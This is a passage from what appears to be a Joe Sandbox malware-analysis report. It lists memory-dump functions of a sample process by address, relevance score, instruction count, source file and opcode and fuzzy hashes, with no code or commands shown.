                      • Instruction Fuzzy Hash: E451F632E0E68A4FEB959F3488692F97BE0FF07304F1505BBD948C2092DA7CA554E742
                      Function 00007FFD344A27E0 Relevance: .2, Instructions: 166COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dfe7b92021cbc080d0b03f0e58f029c7e92716fd7f1fa82a03cab86a22156883
                      • Instruction ID: eb5b3fc4472b80280618cea333938c6a2e4bcf4c56be68bbec7a86b769a20522
                      • Opcode Fuzzy Hash: dfe7b92021cbc080d0b03f0e58f029c7e92716fd7f1fa82a03cab86a22156883
                      • Instruction Fuzzy Hash: DB514E30E1960E8FEB50EBA8C8A56ED77F0FF1A301F11057AD148E7196DEB8A944DB41
                      Function 00007FFD344950B0 Relevance: .2, Instructions: 165COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a5133858e22939fc44a3860fe32191c09e5cb3fba49d264638c4b4ea1be4c2f5
                      • Instruction ID: 4982022f6829723d88fa9a1fa24f2f504affeb36d8e956eecbf1a006ec3a5247
                      • Opcode Fuzzy Hash: a5133858e22939fc44a3860fe32191c09e5cb3fba49d264638c4b4ea1be4c2f5
                      • Instruction Fuzzy Hash: 8E512431E0D68A8FEB99EF6484A92B97BE0FF1A304F1105BED40DC7096CE79A544DB41
                      Function 00007FFD34499110 Relevance: .2, Instructions: 165COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1ebd2f5c4243f87c6455a66465bd3146dbb4c5a7fba01604c898c5e6f652b435
                      • Instruction ID: a606ed4444b832dbc7c1ca0217705057a783e58129f20b4e8489738a5d3022c2
                      • Opcode Fuzzy Hash: 1ebd2f5c4243f87c6455a66465bd3146dbb4c5a7fba01604c898c5e6f652b435
                      • Instruction Fuzzy Hash: 50514832A0D64A4FEB15AFB8D8662EE7BB0EF03314F0401BBD548DB193DE286454DB91
                      Function 00007FFD344A27E8 Relevance: .2, Instructions: 162COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0250965e2f47947a97412fc3c2d0a005801f881d4337963b209a22d554d6b4b5
                      • Instruction ID: 9d180945aca954305ae55ee7f39b17f6743dddb673c1c873a47dc07e6df9e8c7
                      • Opcode Fuzzy Hash: 0250965e2f47947a97412fc3c2d0a005801f881d4337963b209a22d554d6b4b5
                      • Instruction Fuzzy Hash: A1514D30E1960A8FEB50EBA8C8A56ED77F0FF1A301F11057AD148E7196DEB8A944DB41
                      Function 00007FFD3449D270 Relevance: .2, Instructions: 159COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 694796b77e5a6abbc04ae1a1a34ca5146a2f25ce23889aba1723696735bdf39e
                      • Instruction ID: f53239581c3192918d4cc06f2be7f97216364f929b9372735cca00b633c875ea
                      • Opcode Fuzzy Hash: 694796b77e5a6abbc04ae1a1a34ca5146a2f25ce23889aba1723696735bdf39e
                      • Instruction Fuzzy Hash: 3051BD70A0864D8FEB69EB64C8A86BD77E0FF1A301F0105BAD50AD7195DE7DA444E701
                      Function 00007FFD34499128 Relevance: .2, Instructions: 155COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 38c22a52a597d07545db13b447b485a4290049265d9f319ef9758f1c32ef1569
                      • Instruction ID: eb3eb08456d95b13555d868a8e5fc241295800d8a56fa9d275f68dda577c57f1
                      • Opcode Fuzzy Hash: 38c22a52a597d07545db13b447b485a4290049265d9f319ef9758f1c32ef1569
                      • Instruction Fuzzy Hash: 55514932A0D6494FEB15AFA8D8662EE7BB0EF13314F0501BBD608D7193DE286454DB91
                      Function 00007FFD344A3220 Relevance: .2, Instructions: 155COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 98702236f5d5fd86f6bb88046c6bfb8c89bef795967f0e266b8aeb953998ac22
                      • Instruction ID: ba3ced989c176dfcd3b829a0594df2b49a76087542dbf5327e6f0382f34f8a41
                      • Opcode Fuzzy Hash: 98702236f5d5fd86f6bb88046c6bfb8c89bef795967f0e266b8aeb953998ac22
                      • Instruction Fuzzy Hash: FF51DF30E0D60A8FEB91EB64C4A92EEBBF0EF0A310F014576C909D7095FE7CA1489701
                      Function 00007FFD3449FA48 Relevance: .2, Instructions: 151COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 75c8b3e479e253e966f685d5f1486086441b0becd6d97dae7fa655a45e7128c1
                      • Instruction ID: c76ead5e3ee6f5b0032db8fa42e5aa8e04c96ce2083523a66434c7715f3c7503
                      • Opcode Fuzzy Hash: 75c8b3e479e253e966f685d5f1486086441b0becd6d97dae7fa655a45e7128c1
                      • Instruction Fuzzy Hash: FA419D30A4D78A4FE752AB7488A91A97FF0EF17310F0A45F7D544CB0A2EA7CA449D711
                      Function 00007FFD34483145 Relevance: .1, Instructions: 149COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ca0d1e1ca604b0eeb38fb61f602b073424b2c9a3e427a5d04e8ff530b8b67fbd
                      • Instruction ID: a18fdd344f55c27aceb3d29fde07d4d113256b42ebd5bba74bec443d907452b2
                      • Opcode Fuzzy Hash: ca0d1e1ca604b0eeb38fb61f602b073424b2c9a3e427a5d04e8ff530b8b67fbd
                      • Instruction Fuzzy Hash: 65513970E0850D8FEB94EBA8C4A56EDBBF1FF49300F51407AD10DE7296EA7A6944DB00
                      Function 00007FFD344A2808 Relevance: .1, Instructions: 146COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6d9463ef2a2790e84e40b4d19dccaa0b543d3d76f050ac2d839f2a16d4c5304
                      • Instruction ID: 0bbaaaa04fdd603523c1c79c01757a3cd5e28956cb42f278d507c759696abd7d
                      • Opcode Fuzzy Hash: c6d9463ef2a2790e84e40b4d19dccaa0b543d3d76f050ac2d839f2a16d4c5304
                      • Instruction Fuzzy Hash: 1D512930E1960E8FEB90EBA8C8A46ED77F0FF1A301F110579D149E7295DEB8A944DB41
                      Function 00007FFD344A31D0 Relevance: .1, Instructions: 146COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7b28fdad5147131bb5235077308850552c4650be3e05695b44e5588e1edac59
                      • Instruction ID: f1887c70074a3d9bb3a384b745344b18bbd7af8b78d3e3f3c4077536189c0705
                      • Opcode Fuzzy Hash: a7b28fdad5147131bb5235077308850552c4650be3e05695b44e5588e1edac59
                      • Instruction Fuzzy Hash: 6841C33194E38A4FE7928B7088652E97FF0AF17314F0A01BBC945CA497FA6CA449D712
                      Function 00007FFD34482065 Relevance: .1, Instructions: 144COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2edf7ec72458cc22d17c07d9c2b46027fb4601530e6f19d448998c4e7040fc2b
                      • Instruction ID: b713c3319b5acdb208c78a610f633e375c55d93440fcca3379739fdb52d78222
                      • Opcode Fuzzy Hash: 2edf7ec72458cc22d17c07d9c2b46027fb4601530e6f19d448998c4e7040fc2b
                      • Instruction Fuzzy Hash: 7A415832B0C64A1FE795DB78D8A61B9B7E5FF87310B0641BBD10DC3196DE6EA8428341
                      Function 00007FFD34499148 Relevance: .1, Instructions: 143COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 560a3d93c4475e78149290a972fa410915fb70112cc98bb8985fdd88a9c44866
                      • Instruction ID: 72383bc4fa570ba084ec7a3239901cc5e83a3b9961151512e563917aafc57082
                      • Opcode Fuzzy Hash: 560a3d93c4475e78149290a972fa410915fb70112cc98bb8985fdd88a9c44866
                      • Instruction Fuzzy Hash: D7412731A0D28A5FEB159F6498662EE7BB0EF13314F0501BBD608D7183DA686854DB91
                      Function 00007FFD34499D48 Relevance: .1, Instructions: 140COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72db34a96f62bcf8da409b5ec743ad9493e0d9ac7f25a05c56c1e287bd030f2f
                      • Instruction ID: fcf0d38bb5bbbc558ff5b93dddacb421e7dca61ab8317b4d11bd15099fd0612a
                      • Opcode Fuzzy Hash: 72db34a96f62bcf8da409b5ec743ad9493e0d9ac7f25a05c56c1e287bd030f2f
                      • Instruction Fuzzy Hash: F841F971E0D68A4FEBA59F6488A52FA7BE0FF16300F0405BAD50CD22C2DA7C9454AB41
                      Function 00007FFD344A2948 Relevance: .1, Instructions: 140COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e1278795dfb1a6c13b6b475b773458c40a73eace54ca57fb714fb9579db14ec6
                      • Instruction ID: e6572002be6132df9dc29c02ceecfe3040c48ff7ec0e0dfa30e9d0d60f5ec41c
                      • Opcode Fuzzy Hash: e1278795dfb1a6c13b6b475b773458c40a73eace54ca57fb714fb9579db14ec6
                      • Instruction Fuzzy Hash: 04515C70E0A65E8FEB94DFA8C4A42FD7BF1EF1A300F01417AD509E2285DA7C6944DB41
                      Function 00007FFD34492D51 Relevance: .1, Instructions: 139COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 42a27bee83dae082bc792bf5350635f90ff5aeb4244e1ef2af45210adb4fe093
                      • Instruction ID: 32f91e5d8ec7897bf62df3292990d350581228dec3510ad28eab9a5f275cf6b0
                      • Opcode Fuzzy Hash: 42a27bee83dae082bc792bf5350635f90ff5aeb4244e1ef2af45210adb4fe093
                      • Instruction Fuzzy Hash: DE41D330E0861A8FEB91EB64C8A86ED7BF1FF0A310F060976D508D7195DB7CA544EB01
                      Function 00007FFD3449B8A0 Relevance: .1, Instructions: 138COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9c5592756817def266b6d0c2ea665fb09ce34c4c90367a38c8f838f6c23bf22c
                      • Instruction ID: e2af222fbaf71e2c1293364053682ef11e8588b8ccd39db3e959e0e945f6b65f
                      • Opcode Fuzzy Hash: 9c5592756817def266b6d0c2ea665fb09ce34c4c90367a38c8f838f6c23bf22c
                      • Instruction Fuzzy Hash: 5041B130E1D68E8FEB519B6488A56FE7BF0FF4B310F01057AD509E3186DA7C6544A781
                      Function 00007FFD3449D22C Relevance: .1, Instructions: 136COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c49c87550bcab807fd8e418ee3fcd5d7640a4adf2fc27bcb4dc7004e4152a647
                      • Instruction ID: ae085744dd763fc985bb062c14c639bb0ab34f6e06cf3d4e9e21015228d1f9c9
                      • Opcode Fuzzy Hash: c49c87550bcab807fd8e418ee3fcd5d7640a4adf2fc27bcb4dc7004e4152a647
                      • Instruction Fuzzy Hash: 7C41BF70A4D3C98FEB669B2488742E97FB0AF07300F0A01FBD945C7192DA6C9808E752
                      Function 00007FFD344AB8A8 Relevance: .1, Instructions: 135COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b2fdc1c0e954d68dffce7687df9f3e6a29db43cdb3dadf510858d1d229df973
                      • Instruction ID: 819e94148b4115fcdf43fdf4005c0f3b59726a366efe969429bd2148219fef91
                      • Opcode Fuzzy Hash: 3b2fdc1c0e954d68dffce7687df9f3e6a29db43cdb3dadf510858d1d229df973
                      • Instruction Fuzzy Hash: 0B418F30A1AA8E8FEB95DF6488A52FA7BF0FF06310F0105BED609D3196DB786544CB41
                      Function 00007FFD3449D047 Relevance: .1, Instructions: 132COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b50028532c275ca204e0fbb56a79ddfd475d57cf737d7b946cd75ea9def990df
                      • Instruction ID: bd737016d69e6585c9f0ced907fc077e85b2214237be4239ec523defe03eb66f
                      • Opcode Fuzzy Hash: b50028532c275ca204e0fbb56a79ddfd475d57cf737d7b946cd75ea9def990df
                      • Instruction Fuzzy Hash: 05512770E086198FEB90EB58D8A57ADB7B1FF5A304F5180B9D40DE3286DE786985DB00
                      Function 00007FFD34482433 Relevance: .1, Instructions: 126COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 94f697ed7e27f71bd45596deba5f2a55964fbd3d8a41250f3b68b3afd3ad1f2b
                      • Instruction ID: a12b24ffb12e7bc5bd9824ae69985e739682d8a6dc9bfea9c461de60ef5c792e
                      • Opcode Fuzzy Hash: 94f697ed7e27f71bd45596deba5f2a55964fbd3d8a41250f3b68b3afd3ad1f2b
                      • Instruction Fuzzy Hash: 5331AF31A4D5860FE791DB64D8A05E57BE0FF43320F0602B7D548CB0DBD96EA94683C1
                      Function 00007FFD34482231 Relevance: .1, Instructions: 126COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1c86d679bc7fce6bafc07fc7f3beb5e31ee824d664ee350d21bafd704e0eaca
                      • Instruction ID: 92700f6916bd26f8a5e907d432fef92d126291c64b95fa64af30aab87e9c811b
                      • Opcode Fuzzy Hash: c1c86d679bc7fce6bafc07fc7f3beb5e31ee824d664ee350d21bafd704e0eaca
                      • Instruction Fuzzy Hash: F5513330E0822A8EEBA49F54C8A17F8B6B0FF46301F1101BAD54DD6186DFBD5A85EF51
                      Function 00007FFD344950A8 Relevance: .1, Instructions: 125COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 75cc2c7bb37971f37adfbbfea6added5f822cdd41bebfa968ee88b4a681ceb85
                      • Instruction ID: bdcf4c9aea6a4bf0b031eb85812f5cf04c9dcf063baeaa30b95a01d4c64621af
                      • Opcode Fuzzy Hash: 75cc2c7bb37971f37adfbbfea6added5f822cdd41bebfa968ee88b4a681ceb85
                      • Instruction Fuzzy Hash: 8741F932E0E68A4FEB959F3488762F97BE0FF06304F1501BED548C6082DA7DA554E742
                      Function 00007FFD344B3F45 Relevance: .1, Instructions: 124COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0d0c55167da59ccabef1b319e14f3a86de3bfb31922b6cd3958dae7041772161
                      • Instruction ID: 9790291a8ff919b1d82cddc803a2ee266e611b801ee358a4b2934b3c81bbbc41
                      • Opcode Fuzzy Hash: 0d0c55167da59ccabef1b319e14f3a86de3bfb31922b6cd3958dae7041772161
                      • Instruction Fuzzy Hash: 34518370A1592D8FEBA5EB18C8A8BE9B7B1FB59305F5001FA940DE2255DE746E81CF00
                      Function 00007FFD344AFF50 Relevance: .1, Instructions: 121COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c10959675991db98238e3ba4b2e016661234f7f02e84270742512e07c36500f
                      • Instruction ID: bc24502a5f1df9dab256afafdc2d37b4187f1e6e76a3a31c654a3b8ac6a10145
                      • Opcode Fuzzy Hash: 7c10959675991db98238e3ba4b2e016661234f7f02e84270742512e07c36500f
                      • Instruction Fuzzy Hash: DC41D330E09A0D8FDB84EF58C4A56FEB7A2FF5A314F11457AD109D3189CE79A444C780
                      Function 00007FFD34498160 Relevance: .1, Instructions: 121COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0f927018425de7376b22e1a96ae895375f45cf7f1bc6d2b645608167451915b8
                      • Instruction ID: afa21f6bea6f7fb0af7a858a616d71417df4ad536e1c8e3052e35cbf8db45183
                      • Opcode Fuzzy Hash: 0f927018425de7376b22e1a96ae895375f45cf7f1bc6d2b645608167451915b8
                      • Instruction Fuzzy Hash: 0B41BF30A5DA4E8FEB98EF68C8656FE77E0FF16300F01057AD519C3095DBB8A544A741
                      Function 00007FFD344A3F70 Relevance: .1, Instructions: 113COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1e3570c17f97b27b8dd50c57febb3db018cfb29e4fac0e7895fb855564f9168f
                      • Instruction ID: c248be3caa8163666d04e036453712e861bca3388444f22a40ba53fb2973b938
                      • Opcode Fuzzy Hash: 1e3570c17f97b27b8dd50c57febb3db018cfb29e4fac0e7895fb855564f9168f
                      • Instruction Fuzzy Hash: 5041522094E3C64FD7935B704C796A93FB0AF17214F0A05FBD544CA0A3E66D9949E722
                      Function 00007FFD34492EDF Relevance: .1, Instructions: 111COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 899b60794b6004e6b8c230b8d6b57a1f57700b994c82e06943a62352c8eebf26
                      • Instruction ID: 79bfc2b51158b45854e7b30da7c5483853019c399c5ae67d8d8eed4da73767bf
                      • Opcode Fuzzy Hash: 899b60794b6004e6b8c230b8d6b57a1f57700b994c82e06943a62352c8eebf26
                      • Instruction Fuzzy Hash: E941C670E08A1D8FDB94EF58D8A57ACB7B1FF5A301F1041BAD00DE3296DE7869819B00
                      Function 00007FFD34498DAD Relevance: .1, Instructions: 110COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0d2c00836310cd659aaca513167055bc84ee928477ec0fb7e7f837e60e6330b
                      • Instruction ID: 8fb80a2145015cf9eeba38ae14a708bfa976b8945e3667e973c7cfc9eafed7d0
                      • Opcode Fuzzy Hash: e0d2c00836310cd659aaca513167055bc84ee928477ec0fb7e7f837e60e6330b
                      • Instruction Fuzzy Hash: 2B31D030E1968A8FEF55DFA4C8616ED7BF1EF06300F05017AE009E7286DABC9941DB51
                      Function 00007FFD3449F6C8 Relevance: .1, Instructions: 108COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f37f14237236867dfbadcbe7c5b39eddcee3c33025413908f7c3e0714c7e7fd6
                      • Instruction ID: 887573901f304bce4d7fbfeeeb4a08d308f1b48b20d4299ee23f65de00f5e0bf
                      • Opcode Fuzzy Hash: f37f14237236867dfbadcbe7c5b39eddcee3c33025413908f7c3e0714c7e7fd6
                      • Instruction Fuzzy Hash: 08415C30A1875E8FEB91EB2888A43ED77F0FF1A300F0105BAD509D2195DFB89984AB41
                      Function 00007FFD344A2830 Relevance: .1, Instructions: 108COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 421303c3f3487203737229264d4831fef77258b04896f0063c8bd5f09ffa2bf0
                      • Instruction ID: 04890895f65042b729a74a7037b696ff9fdfaaae51e2e8e826ffd97e89c51089
                      • Opcode Fuzzy Hash: 421303c3f3487203737229264d4831fef77258b04896f0063c8bd5f09ffa2bf0
                      • Instruction Fuzzy Hash: BC318731E09A4E8FDB68DE68C8A12FE77B0FF5A300F01007AD589D2291CEB96954DB40
                      Function 00007FFD344AD475 Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9377bf970955c1c099dee2fd839496a65fdf51b9aaa7cc878b6f3912bb9288cd
                      • Instruction ID: 52ca92bfc611358b5a8895bbf45b885ac673d9c557e37b1f6785098bf291c148
                      • Opcode Fuzzy Hash: 9377bf970955c1c099dee2fd839496a65fdf51b9aaa7cc878b6f3912bb9288cd
                      • Instruction Fuzzy Hash: 1D310271B0EA494FD785DB6C98E56A537A1FF9A31831602B6D40CCB19BC92CB8058791
                      Function 00007FFD3449B950 Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6c99604511c59c07b5ae14093426f464af54ff2820725c7ed80b39afcc60f03
                      • Instruction ID: 65e1fd39f541ebc405c11c631352e47a404563ebc1feac3314dbfcb2bb31613c
